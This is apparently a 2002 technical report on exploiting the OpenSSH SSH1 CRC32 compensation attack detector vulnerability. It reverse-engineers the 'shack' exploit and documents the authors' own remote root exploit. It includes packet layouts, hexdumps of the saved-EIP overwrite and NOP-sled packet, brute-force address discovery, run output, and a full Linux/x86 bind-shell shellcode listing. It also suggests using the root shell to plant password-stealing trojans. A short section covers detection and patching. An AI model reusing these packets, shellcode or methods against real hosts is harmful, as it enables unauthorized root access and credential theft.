On #5 is the assignment operation. This is where the memory can be written. The 'h' is the pointer to 16-bit values. So the "h[i] = j" clause can be expressed also with byte pointers *(h+2*i) = j Thus, the value of 'j' (the current block number) is written to a specific distance from the 'h'. Because the value of 'i' is fetched from the packet and the 'j' is the block number, the 'i' can be used as a offset value and the placement of the 'i' can be used as the value that is written to the memory.
The following figure hopefully clears the idea:
block incoming packet
number ('buf')
('j')
___________________
0000 | 00000000 xxxxxxxx |
0001 | 00000000 xxxxxxxx |
0002 | 00000000 xxxxxxxx |
0003 | 00000000 xxxxxxxx |
0004 | 00000000 xxxxxxxx |
0005 | 00000000 xxxxxxxx |
0006 | beefcafe xxxxxxxx |
....
0332 | 00000042 xxxxxxxx |
....
For example, on the 6th block:
j = 6
i = 0xbeefcafe
So, the following assignment is done:
h[i] = j; ===> h+2*i = j; ===> h+2*0x1234abcd = 6;
And on the 332th block:
j = 332
i = 0x42
h[i] = j; ===> h+2*i = j; ===> h+2*0x00000123 = 332;
Notes to remember: The value in the packet means the offset (multiplied by 2) from the address of 'h' and the place where the value is located means the value to be stored in memory [5].
The shellcode insertion is done basically with a packet like this (knowledge of the exact parameters is required):
___________________
0000 | xxxxxxxx ffffffff |
| .... |
| ZZZZZZZZ xxxxxxxx | WRITE THE VALUE TO EIP
| .... |
| ZZZZZZZZ xxxxxxxx | WRITE THE NEW VALUE TO EIP
| xxxxxxxx xxxxxxxx | CRC32 ATTACK PATTERN START
| .... |
| xxxxxxxx xxxxxxxx | CRC32 ATTACK PATTERN END
| 90909090 90909090 | NOP SLED
| .... |
| xxxxxxxx xxxxxxxx | SHELL CODE
|___________________|
xxxxx =
ZZZZZZZZ = (offset to the high word of the stored instruction pointer)/2,
XXXX = value of the instruction pointer (high word)
YYYY = where to jump (high word, low word stays the same)
3.1 First incidents
The vulnerability was announced on February 8th 2001. It was discovered by Michal Zaleski of the BindView RAZOR Team. [6] [7]
Even thought the vulnerability was discovered early, many site administrators didn't update their SSH daemons. The experts assumed that the possibility of the exploit were ridiculously small and that there will not be any working mass exploit engines. They were wrong. The incident below is one of the first incidents that were analysed. It clearly shows that the exploit can be used. The rumour says that the big finnish hack incidents on winter 2001-2002 were also done by using this exploit.
"On October 6, 2001, intruders originating from network blocks in the Netherlands used an exploit for the crc32 compensation attack detector vulnerability to remotely compromise a Red Hat Linux system on the UW network running OpenSSH 2.1.1." This vulnerability is described in CERT Vulnerability note VU#945216 [6]:
Once in the system, a series of operating system commands were replaced with trojan horses to provide back doors for later entry and to conceal the presence of the intruders in the system. A second SSH server was run on a high numbered port (39999/tcp). The system was then used for broad scanning (outbound from the UW network) to identify more systems running OpenSSH 2.1.1, some of which were then attacked manually." [8] [9]
3.2 Problems
As one can see after examining the detect_attack() function, the hardest problem in exploiting is the addresses of critical variables and the address of the return pointer.
A successful exploit must guess the following parameters (or some parameters that the following can be calculated from):
distance between 'h' and 'buf'
distance between 'h' and the return address on the stack
the value of the return address (higher word enough)
the absolute address of 'buf'
With these parameters the exploit is somewhat straighforward. Educated guesses can be made with the knowledge of the host (operating system, processor, linux distribution, kernel version etc). This information should be easy to gather using automated tools. The attacker could for example get the version strings of mail, ftp, http, ssh, imap, and pop servers and compare them with the default versions of some distributions. This way he can get the same SSHD daemon and maybe try it on his lab.
Part of the parameters can be find using brute force methods. The buffer 'buf' can be found using a packet that writes to a specific region of memory. Making a educated guess of the boundaries where the buffer is located and starting to write from there. If the server dies (client sees connection closing), the algorithm should change the address and start again. The server dies because of segmentation fault (i.e. writing to a read-only memory etc). If the server reports something like "invalid bytes on packet", the writing was successful and the buffer is located (on high probability).
3.3 Available implementations
The implementations of this exploit are not easy to get. We were able to find a binary exploit called shack. This can be downloaded from [10].
The source code of the binary is not available but an analysis of an attack done with this tool can be read at [11].
The shack tries to locate the parameters using couple binary searches. After it has revealed good enough estimates of memory locations, it starts the bruteforcing. The shellcode of the shack creates a root shell on the host machine and the attacker can use it to install the trojans.
We tried the shack on couple of servers running the same version of OpenSSH. One host was succesfully exploited with this, the other one wasn't. Our exploit worked for both.
Another exploit by zip/TESO should be wondering somewhere, at least there are some analysis about that: [8]
Both of the analysis are concentrated on the network traffic and detection. It is kind of disappointing that nobody has analyzed the exploits in the lower levels, or how it is done.
We used the tcpflow-program to capture the network traffic created by shack. After analyzing the traffic we were able to reverse engineer the code almost completely. The process is documented in Chapter 4 [12].
3.4 Shellcode
Shellcode means the code that the attacker wants to run on a target computer. The code creates a shell hopefully running as root account. One version of shellcode is a portshell. It creates a backdoor that listens some specific TCP port on the target machine. When the attacker telnets to the target to that port, the portshell binds a shell to the tcp stream and the attacker has his own telnet-type access (with root-account!).
The shellcode is typically ran only a few minutes. In that time the attacker tries to install his rootkits and trojans, clears the logs and traces. After that the attacker uses some ordinary access type to get to the host.
Shellcodes are always platform dependant because they are made of assembly instructions. The attacker must know what platform is on the target. Shellcodes usually don't contain any zero bytes because then they couldn't be used with strpcy() functions. For example 'mov eax,0' must be transformed as 'xor eax,eax'. This does the eax clearing but doesn't contain zero when its run through assembler.
A shellcode example (port shell) with sources can be seen at [13]
The Phrack magazine has a great article about shellcodes and buffer overflows: [1]
4 Our exploit
4.1 Goals
The meaning of our exploit project is to hijack a remote host running sshd. this is attempted using sshd's vulnerabilities discussed in Chapter 2. The goal is to be able to access the remote host with root privileges and thereby gain access to all information and controls on the target host.
4.2 Resources
ssh daemon (modified)
We used Openssh-2.2.0p1 as the victim's ssh daemon. This implementation of sshd (protocol version less than 2) was known to be vulnerable to our attack and it was easily available over the Internet. We modified the sshd for the development phase by having it print out important frame and stack information. The stack location information was helpful in fine-tuning function return address overwriting. BSS memory section's location information gave directions to finding our shellcode in memory.
After the exploit application was finished, we restored the sshd to its original state.
ssh client source code
Openssh-2.3.0p1 was used as a platform for our exploit, since we found one occasion where a similar exploit was possible with this version. However, as far as we know, any other ssh client may have been used in our exploit.
In order to have the client to send the encrypted ssh packets of our choice, we modified the client to send exactly those cipherblocks we asked it to. Usually the client takes plaintext from the user and sends its ciphertext over the network. This time we wanted to send specific ciphertext and actually we did not care about the corresponding plaintext.
We let the client do key exchange in the ordinary fashion, but when the ciphering starts and user authentication is about to begin, we send malicious packets to the victim.
Teso/Shack logs & network traffic
We acquired a similar exploit from 'Team Teso', which was successful in running the required shellcode, but only with very good initial guesses for stack and bss section locations. This implementation was very inefficient.
We found another exploit called 'shack' which is related to 'anti.security.is'. This exploit is assumed to be proprietary in the first place and for sale, but it slipped to public. Only the binary of this exploit was available. Although the logs it generates gave us hints what it was doing. Some references call this exploit the Teso-exploit, but we think that it only uses the teso-method to find a critical parameter run-time.
The 'shack' exploit was a black box to us and we conducted extended analysis of the network traffic it generated.
Shellcode
We acquired a shellcode from Anathema anathema@hack.co.za, which was used in our implementation. See appendix 7.1. This implementation will create a socket for enabling remote access, bind the socket to the process, accept connections to port 36864, and execute a shell.
4.3 Process
We created an exploit application for handling the brute force methodology of the exploit. It uses the modified ssh client to try connections to the victim, with certain intelligence. The application generates malicious packets for the victim and lets the modified ssh client send them. Depending on the output of the server, the application makes conclusions on the effects of the malicious packet. The server may return such messages as 'corrupt bytes in packet' or 'CRC32 compensation attack detected'. Although, the most frequent response is a mere connection close since the server crashes often (SEGV). These output strings are analysed and used as directions for next malicious packets. It is very typical that the connection closes after the first cipherpacket, since it is somehow malformed. For example our exploit doesn't consider CRC checksums and therefore the sshd closes the connection. Although, a lot can happen before the connection is closed…
The process itself consists of four phases, of who the last one attempts to run the shellcode.
4.3.1 Reverse Engineering
The shack exploit surprised us with its capability to find out critical addresses concerning the exploit. A utility program called 'tcpflow' and gnu debugger were used to reverse engineer the operation of the shack exploit. Tcpflow is a program which captures entire tcp connections combining all relevant packets together. This tool was crucial in succeeding to make a working exploit.
Hexdump was used to interpret the data in readable format:
hexdump -e '"%07.7_ax " 16/1 "%02x " "n"' -s 0xb8 192.168.001.010.03164-192.168.001.001.02222 | less
Gdb was used to diagnose various erroneous states and in confirming memory address calculations.
4.3.2 Packet sending
We modified the packet.c source file in such a way that the client sends dedicated cipherpackets we ask it to. Packet.c includes a function definition for packet_write_poll() which is used to write the ciphertext to outgoing buffer. Our modified implementation reads the desired cipherpacket from a file '/tmp/exploit_packet' and sends it. These packet files are written by our exploit application.
4.3.3 Finding distance to 'buf'
The first thing that can be calculated in the server's memory addresses is the distance from variable h to variable buf (according to detect_attack() function). The following format of cipherpacket was used to search for the distance from h to buf:
Extract from packet #1:
00000b8 00 00 00 00 ff ff ff ff 00 00 00 01 ff ff ff ff
00000c8 00 00 00 04 ff ff ff ff 00 00 00 05 ff ff ff ff
00000d8 00 00 00 08 ff ff ff ff 00 00 00 09 ff ff ff ff
00000e8 00 00 00 0c ff ff ff ff 00 00 00 0d ff ff ff ff
00000f8 00 00 00 10 ff ff ff ff 00 00 00 11 ff ff ff ff
...
This is the first type of packet that our exploit uses. It consists of 184-byte header and 102400 bytes 8-byte blocks that consist of a small 32-bit number and 0xFFFF. Consecutive packets increase the small numbers. When sshd processes this kind of packet, it will set i to first 32-bits of each 8-byte block (#3 in detect_attack()). It tries to read memory at h[i] on the same line. This read will cause SEGV if i is such an offset to h that the address is not readable. SEGV also happens if buf + h[i] * 8 is unreadable. With this kind of packet, the sshd will practically always SEGV at #4 in detect_attack() when done thousands of times in a row.
The trick is to have i[small number] point always to 0xFFFF. This is same as 'HASH_UNUSED' and the memory read is skipped. The packet contains 12800 small numbers that make h[i] point to a loose array of approximately half the length of the packet. When the first small number in the packet points to the first half of the buffer, each h[i] will have value 0xFF and the memory read is skipped. It would be extremely rare to find such an array in memory in a place other than buf. Binary search is used to find the smallest small number that will not cause SEGV. A hit to buf will cause 'corrupt bytes' response from the sshd.
In the first phase, the small number is increased by packet_length / 4 so that its pointed address h[small number] points packet_length / 2 forward on each packet. This is a fast scan through the memory to find appriximate distance from h to buf. The second phase is a binary search which will find the distance accurately and reliably.
4.3.4 Finding distance to kernel space
The next memory address to find is h-to-kernel_space distance. The reason why we are interested in this distance is that the stack frame of the current process is close to the kernel space i.e. somewhere below address 0xC0000000. The stack frame is of interest since the saved EIP of the parent function is there. See Chapter 2.3. In this phase, we use a dedicated type of ssh-cipherpacket to test if h[i] is readable (#3 in detect_attack()) and small enough that 'buf + h[i] * SSH_BLOCKSIZE' is readable (#4 in detect_attack()). The stack area contains such small numbers. This packet type uses this test only once - at 0x5BFC4280 in the packet hexdump extract below. We want to test one address only and exit the process as quickly as we can. The pattern of '0x00002860 0100FFFF's is a tell-tale sign for the sshd that this packet uses CRC32 compensation attack. We want the sshd to think like this in order to close the connection right away and speed up the process. On the other hand we can now distinguish between SEGV while processing the first 8-byte ssh block and CRC32 compensation attack detected while processing the second block. This will let the attacker know if the sshd could read memory at 0x5BFC4280.
The packets our exploit sends are filled with the quess for h-to-kernel_space offset (16-bit), although it is required only in the very beginning of the packet.
000000b8 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
000000c8 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
000000d8 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
000000e8 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
000000f8 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
00000108 00 00 28 60 01 00 ff ff 00 00 28 60 01 00 ff ff ; ..(`..ÿÿ..(`..ÿÿ
00000118 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
00000128 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
00000138 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
00000148 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
00000158 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
00000168 00 00 28 60 01 00 ff ff 00 00 28 60 01 00 ff ff ; ..(`..ÿÿ..(`..ÿÿ
00000178 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
00000188 00 00 28 60 01 00 ff ff 5b fc 42 80 73 50 ff ff ; ..(`..ÿÿ[üB€sPÿÿ
00000198 00 00 28 60 01 00 ff ff 00 00 28 60 01 00 ff ff ; ..(`..ÿÿ..(`..ÿÿ
000001a8 5b fc 42 80 73 50 ff ff 00 00 28 60 01 00 ff ff ; [üB€sPÿÿ..(`..ÿÿ
000001b8 00 00 28 60 01 00 ff ff 00 00 28 60 01 00 ff ff ; ..(`..ÿÿ..(`..ÿÿ
000001c8 5b fc 42 80 73 50 ff ff 5b fc 42 80 73 50 ff ff ; [üB€sPÿÿ[üB€sPÿÿ
...
Our exploit is a bit simplified version of the 'shack' implementation in this phase. Shack uses three different packet types to hunt down the h-to-stack distance with binary search. Our exploit only finds the distance from h to kernel_space. Although the difference is usually quite small and we can compensate the error in the shellcode phase. Our current implementation brute forces the distance beginning from an educated quess. It starts testing addresses way deep in the kernel space and comes down gradually and finds the lower bound of the kernel space. With this distance, we can calculate the addresses for h and buf.
4.3.4 Sending shellcode
The heart of our exploit is to send the packet that finalizes the breach to the victim host. This packet combines basically three important functions. It rewrites the saved EIP in the stack frame, exits the attack_detect() function call as quickly as possible, and when returned, executes the shellcode that lets the attacker telnet to the victim and control a root shell. The base of this packet is NOP instruction (0x90 on Intel x86 architecture) since it occupies most of this packet. Other contents are inserted where necessary. The following tcpdump extract shows what this ssh cipherpacket consists of.
000000b8 00 00 28 5d 73 50 ff ff 00 00 28 61 73 50 ff ff ; ..(]sPyy..(asPyy
000000c8 00 00 28 65 73 50 ff ff 00 00 28 69 73 50 ff ff ; ..(esPyy..(isPyy
000000d8 00 00 28 6d 73 50 ff ff 00 00 28 71 73 50 ff ff ; ..(msPyy..(qsPyy
000000e8 00 00 28 75 73 50 ff ff 00 00 28 79 73 50 ff ff ; ..(usPyy..(ysPyy
000000f8 00 00 28 7d 73 50 ff ff 00 00 28 81 73 50 ff ff ; ..(}sPyy..(sPyy
…
000040c8 00 00 48 65 73 50 ff ff 00 00 48 69 73 50 ff ff ; ..HesPyy..HisPyy
000040d8 00 00 48 6d 73 50 ff ff 00 00 48 71 73 50 ff ff ; ..HmsPyy..HqsPyy
000040e8 5b fc 2f 7f 73 50 ff ff 00 00 48 79 73 50 ff ff ; [ü/sPyy..HysPyy
000040f8 5b fc 2f 7f 73 50 ff ff 00 00 48 80 09 08 90 90 ; [ü/sPyy..H€..
00004108 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
00004118 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
00004128 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
00004138 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
00004148 00 00 48 80 09 08 90 90 00 00 48 80 09 08 90 90 ; ..H€.. ..H€..
00004158 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 :
00004168 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 :
00004178 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
00004188 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
00004198 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
000041a8 00 00 48 80 09 08 90 90 00 00 48 80 09 08 90 90 ; ..H€.. ..H€..
000041b8 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
000041c8 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
000041d8 00 00 48 80 09 08 90 90 00 00 48 80 09 08 90 90 ; ..H€.. ..H€..
000041e8 90 90 90 90 90 90 90 90 00 00 48 80 09 08 90 90 ; ..H€..
000041f8 00 00 48 80 09 08 90 90 00 00 48 80 09 08 90 90 ; ..H€.. ..H€..
00004208 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 :
…
00019028 eb 72 5e 29 c0 89 46 10 40 89 c3 89 46 0c 40 89 ; ër^)À‰F.@‰Ã‰F.@‰
00019038 46 08 8d 4e 08 b0 66 cd 80 43 c6 46 10 10 66 89 ; F.N.°fÍ€CÆF..f‰
00019048 5e 14 88 46 08 29 c0 89 c2 89 46 18 b0 90 66 89 ; ^.ˆF.)À‰Â‰F.°f‰
00019058 46 16 8d 4e 14 89 4e 0c 8d 4e 08 b0 66 cd 80 89 ; F.N.‰N.N.°fÍ€‰
00019068 5e 0c 43 43 b0 66 cd 80 89 56 0c 89 56 10 b0 66 ; ^.CC°fÍ€‰V.‰V.°f
00019078 43 cd 80 86 c3 b0 3f 29 c9 cd 80 b0 3f 41 cd 80 ; CÍ€†Ã°?)ÉÍ€°?AÍ€
00019088 b0 3f 41 cd 80 88 56 07 89 76 0c 87 f3 8d 4b 0c ; °?AÍ€ˆV.‰v.‡óK.
00019098 b0 0b cd 80 e8 89 ff ff ff 2f 62 69 6e 2f 73 68 ; °.Í€è‰yyy/bin/sh
000190a8 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ;
The first part of the packet is designed so that the for loop (before #3 in detect_attack()) increases the value of j, See Chapter 3 for more information. These blocks are filled with offsets for h to point to the following 0xFF's. This will make the for loop run quickly and smoothly until j is what we want it to be. We want j to be that value which will be written to saved_EIP. The most significant word (16-bit) of the saved_EIP is usually around 0x807. The least significant word can be whatever. Since detect_attack() will try to read memory at (buf + h[i] * SSH_BLOCKSIZE) at #4, the value we write on top of the old word in the memory cannot be very large. This means that we can only write small numbers to memory with detect_attack(). This is a reason for only writing the most significant byte of the saved_EIP, which is only about 0x807 and makes (buf + h[i] * SSH_BLOCKSIZE) readable at #4. However, this is no problem for our exploit, because our NOP sled is over 0xFFFF long and it doesn't matter what the LSW of EIP is if the MSW is correct.
When j is the desired saved_EIP_MSW (guessed), we set i to be the h-to-saved_EIP offset (guessed). Now detect_attack() will have to reach point #5 to write the new EIP with correct values of i and j. This is only possible when if clause at #4 is true and the CRC will be checked with check_crc(). This check will not generate 'CRC32 compensation attack detected' message since there is no attack pattern. On the contrary, the crc_check() will pass and the for loop is broken out of. Now h[i] will be j and detect_attack() has been exploited.
One more thing: The comparison at #4 will only pass if the block at c is the same as (buf + h[i] * SSH_BLOCKSIZE). j will be the target saved_EIP_MSW (such as 0x807) and c is (buf + j * SSH_BLOCKSIZE), so we need to fix the contents at (buf + h[i] * SSH_BLOCKSIZE) to be the same as at c. h[i] hopefully points to the MSW of saved_EIP and has a value that is the real return address for detect_attack() at this point. This is usually something like 0x805. This means that the block number 0x805 in our packet must have the same content as the block number 0x807 at hand. Therefore we need to have an exact copy of the saved_EIP_MSW writing block at 0x807. In the tcpdump above, these two blocks can be seen at 0x40E8 and at 0x40F8.
Once again, these blocks are followed by the CRC32 compensation attack pattern for exiting the outer for loop as quickly as possible. This pattern consists of 15 blocks that each include a h-to-buffer offset that points to the first block of this pattern (0x809, GET_CRC32() order). When detect_attack() processes the block number 0x809, it detects the attack and returns. By a miracle, the return address is now 0x807 and the process execution jumps to a new location, hopefully the NOP sled in the buffer.
4.3.5 Executing shellcode
Once the EIP lands on the NOP sled in buf, the execution will slide down the sled to the shellcode, where the attackers code will be executed with root privileges. The system call to execve in the shellcode will capture the ongoing process which will be bound to a tcp port.
The shellcode itself is 128 bytes long including the string that is passed to execve system call. The biggest problem of the shellcode is that it will have to know the address of the string "/bin/sh" in order to pass it as an argument to the system interrupt. For this purpose, it uses a call-pop combination to write EIP to stack and then pop it from the stack. Easy as that.
Assuming now that J stands for the JMP instruction, C for the CALL instruction, and s for the string, the execution flow would now be [1]:
Arrangement of Shellcode execution:
bottom of DDDDDDDDEEEEEEEEEEE top of
memory 89ABCDEF0123456789A memory
buffer
<------ [JSSSSSSSSSSSSSSCCss]
|^ ^|
|| ||
(1) ||_____________||
|______________| (2)
top of bottom of
stack stack
See Appendix 7.1 for details.
4.4 Using exploit
The exploit application is a command-line utility that can be run on many different platforms. In the case of Intel x86 architecture, Linux, and victim sshd version openssh-2.2.0p1, the exploit works fine with no command-line arguments whatsoever. With different platforms, some parameter need adjusting to run the exploit in sensible time span.
A user of our exploit needs:
Openssh-2.3.0 client sourcecode
packet.diff for modifying the ssh client
uxp2.c sourcecode (our exploit application)
See Appendix 7.3 for packet.diff and uxp2.c source code files.
See Appendix 7.2 for details what the exploit looks like from the attackers point of view.
After the attacker connects to the victims new open port and root shell, the sshd gives 10 minutes to run commands as root. After those minutes the sshd parent process that forks children for individual connections will close the connection in the name of a time-out. This time can be used to implant Trojan horses and other malicious programs into the victim that will for example expose passwords as they are typed in.
4.5 Advantages and Disadvantages
The advantage of the exploit is that it runs without any parameters and succeeds to run the shellcode with some non-zero probability. The application runs the shellcode quite quickly compared to some other CRC32 attack detector exploits that also require perfect guesses for addresses.
The biggest disadvantage is that the application is heavily optimized for our own hardware and software platform. The application could prompt the user for different target sshd-implementations, for example. Some memory-address distances are determined by brute-force means. Switching to binary search could make the exploit a lot quicker. The exploit could also include some sort of root kit or tools to preserve the access to the victim host.
5 Counter actions
5.1 Detecting attacks
Detecting attacks using this exploit can be done pretty easily if the host has already some active log monitor or traffic follower (e.g. snort) running.
The traffic is quite notable because this is based on bruteforcing. The count of log entries on target machine will be therefore high. The following strings could be filtered out with the log monitor:
sshd[24399]: Disconnecting: Corrupted check bytes on input.
sshd[24439]: Disconnecting: crc32 compensation attack: network attack detected
If those entries are matched many on a row, the log monitor could dynamically set the firewall to block the connections from the source ip mentioned on the logs.
The traffic monitor could either check the lengths of the packets or if the packet contains lot of NOP instructions (0x90 on Intel platforms). The length of the packets is fairly constant (about 100kB) and there are only one big packet per connection and then the connection is dropped. Snort could be configured to do this monitoring easily.
Also the normal hack detection methods can be used. For example check the integrity of binaries using some automated tool (e.g. tripwire). If the logs are kept on and sent real-time to different, secure host, then the logs should inform about something mystical because they can't be tampered.
5.2 Required actions after being attacked
If the system's security is breached:
disconnect the machine from the network immediately
disconnect also the other hosts 'near' the infected one because probably the attacker has gained root on those machines as well
notify the users of this host
start to analyze the logs with security expert and inform the police if necessary (helps you in the case where your host is used in hacking other hosts)
do NOT put the machine in a production environment without complete system reinstall
This is the same procedure that should be followed in any hack suspicion.
5.3 Preventive actions
The vulnerability is easily fixed: change the variable n from 16-bit to 32-bit or set some kind of check for packet length or the value of n.
Frankly, updating your SSH daemon to a newer, secure version is the safest bet.
If the users are willing, restrict the hosts where the users can log from. This can be done using firewall settings.
6 References
[1] Aleph One: [phrack] Smashing The Stack For Fun And Profit [online] [referenced March 20, 2002] Vol 7, Issue 49
Available from: <http://www.phrack.com/phrack/49/P49-14>
[2] blackshell@hushmail.com: [Securityfocus bugtraq: vuln-dev archive] ssh1 remote root exploit [online]. [referenced March 20, 2002] Available from: <http://online.securityfocus.com/archive/82/247801>
[3] Johnson, Michael K. Linux Memory Management Overview. In Linux documentation project [online] [referenced March 20, 2002] Available from: <http://www.linuxdoc.org/LDP/khg/HyperNews/get/memory/linuxmm.html>
[4] Visscher Paul. readelf man page [online] [referenced March 20, 2002] Available from: <http://www.gnu.org/manual/binutils-2.10.1/html_chapter/binutils_14.html>
[5] Starzetz, Paul. ssh1.crc32.txt [online article] [referenced March 20, 2002] Available from: <http://packetstorm.widexs.nl/0102-exploits/ssh1.crc32.txt>
[6] Lanza, Jeffrey P. Vulnerability Note VU#945216 [online], Carnegie Mellon Software Engineering Institute. [referenced March 20, 2002] Available from: <http://www.kb.cert.org/vuls/id/945216>
[7] SSH CRC-32 Compensation Attack Detector Vulnerability, Securiryfocus.com bugtraq list [online]. [referenced March 20, 2002] Available from: <http://online.securityfocus.com/bid/2347>
[8] Dittrich, David A. Analysis of SSH crc32 compensation attack detector exploit [online]. [referenced March 20, 2002] Available from: <http://staff.washington.edu/dittrich/misc/ssh-analysis.txt>
[9] Rafail, Jason A.; Dougherty, Chad. CERT® Advisory CA-2001-35 Recent Activity Against Secure Shell Daemons [online] Carnegie Mellon Software Engineering Institute. [referenced March 20, 2002] Available from: <http://www.cert.org/advisories/CA-2001-35.html>
[10] Packetstorm exploit archive, Shack exploit [online] [referenced March 20, 2002] <http://packetstorm.widexs.nl/0201-exploits/cm-ssh.tgz>
[11] Incidents.org, Handler's Diary Thursday, December 13th 2001 [online] [referenced March 20, 2002] <http://www.incidents.org/diary/diary.php?id=118>
[12] Elson, Jeremy. tcpflow -- A TCP Flow Recorder [online] [referenced March 20, 2002] <http://www.circlemud.org/~jelson/software/tcpflow/>
[13] jsb4ch@hotmail.com, ANTI-prym/h4g1s portshell code [online] [referenced March 20, 2002] <http://www.cotse.com/sw/linux/portshell.txt>
[14] Heinisuo, Rami et al.: Elektronisen viittaamisen opas [online]. Jyväskylä: University of Jyväskylä, 1997 [referenced January 27, 2002] Available from: <http://lib.hut.fi/Elehdet/Elviira/ >
[15] Siegert, Martin: [linux-security] ssh1 remote root exploit [online]. Simon Fraser University, 2001 [referenced January 27, 2002] SFU's linux-security mailing list. Available from: <http://www.sfu.ca/~siegert/linux-security/msg00017.html>
[16] SSH statement regarding the vulnerability of SSH1 protocol <http://www.ssh.com/products/ssh/cert/>
[17] Possible OpenSSH DoS Attack <http://www.securityfocus.com/cgi-bin/archive.pl?id=82&start=2002-01-26&end=2002-02-01&threads=0&mid=004401c181d1$2b91adc0$0400a8c0@pi>
[18] SSH Vulnerability Scan Vulnerability to CRC32 compensation attack detector exploit <http://www.securityfocus.com/archive/1/243644> <http://staff.washington.edu/dittrich/misc/ssh-analysis.txt>
[19] Cisco Security Advisory: Multiple SSH Vulnerabilities <http://www.cisco.com/warp/public/707/SSH-multiple-pub.html>
[20] OpenSSH subject to traffic analysis <http://www.securityfocus.com/archive/1/176117/> <http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt>
[21] SSH brute forcer <http://www.securityfocus.com/archive/82/252405>
[22] blackshell tool1: SSHD vulnerability scanner <http://www.securityfocus.com/archive/82/247801>
[23] Ylönen, Tatu. The SSH (Secure Shell) Remote Login Protocol [online] [referenced March 20, 2002] <http://www.snailbook.com/docs/protocol-1.5.txt>
7 Appendices
7.1 Shellcode
/*
* Linux/x86
* TCP/36864 portshell (old, could be optimized further)
*/
char shellcode[] = /* anathema <anathema@hack.co.za> */
/* main: */
"xebx72" /* jmp callz */
/* start: */
"xebx72" /* popl %esi */
/* socket() */
"x29xc0" /* subl %eax, %eax */
"x89x46x10" /* movl %eax, 0x10(%esi) */
"x40" /* incl %eax */
"x89xc3" /* movl %eax, %ebx */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"x40" /* incl %eax */
"x89x46x08" /* movl %eax, 0x08(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* bind() */
"x43" /* incl %ebx */
"xc6x46x10x10" /* movb $0x10, 0x10(%esi) */
"x66x89x5ex14" /* movw %bx, 0x14(%esi) */
"x88x46x08" /* movb %al, 0x08(%esi) */
"x29xc0" /* subl %eax, %eax */
"x89xc2" /* movl %eax, %edx */
"x89x46x18" /* movl %eax, 0x18(%esi) */
"xb0x90" /* movb $0x90, %al */
"x66x89x46x16" /* movw %ax, 0x16(%esi) */
"x8dx4ex14" /* leal 0x14(%esi), %ecx */
"x89x4ex0c" /* movl %ecx, 0x0c(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* listen() */
"x89x5ex0c" /* movl %ebx, 0x0c(%esi) */
"x43" /* incl %ebx */
"x43" /* incl %ebx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* accept() */
"x89x56x0c" /* movl %edx, 0x0c(%esi) */
"x89x56x10" /* movl %edx, 0x10(%esi) */
"xb0x66" /* movb $0x66, %al */
"x43" /* incl %ebx */
"xcdx80" /* int $0x80 */
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"x86xc3" /* xchgb %al, %bl */
"xb0x3f" /* movb $0x3f, %al */
"x29xc9" /* subl %ecx, %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
/* execve() */
"x88x56x07" /* movb %dl, 0x07(%esi) */
"x89x76x0c" /* movl %esi, 0x0c(%esi) */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx0c" /* leal 0x0c(%ebx), %ecx */
"xb0x0b" /* movb $0x0b, %al */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8x89xffxffxff" /* call start */
"/bin/sh";
7.2 Exploit usage
[root@localhost exploit]# ../uxp2
Finding estimate for h..buf distance
Testing h..buf offset: 0x00000000 B NOT FOUND (SEQV)
Testing h..buf offset: 0x0000c800 B FOUND (Corrupt bytes)
Finding exact h..buf distance
Testing h..buf offset: 0x00004800 B (prev. step=0x00008000h) NOT FOUND. Increasing by 0x00002000
Testing h..buf offset: 0x00008800 B (prev. step=0x00004000h) FOUND. Decreasing by 0x00001000
Testing h..buf offset: 0x00006800 B (prev. step=0x00002000h) FOUND. Decreasing by 0x00000800
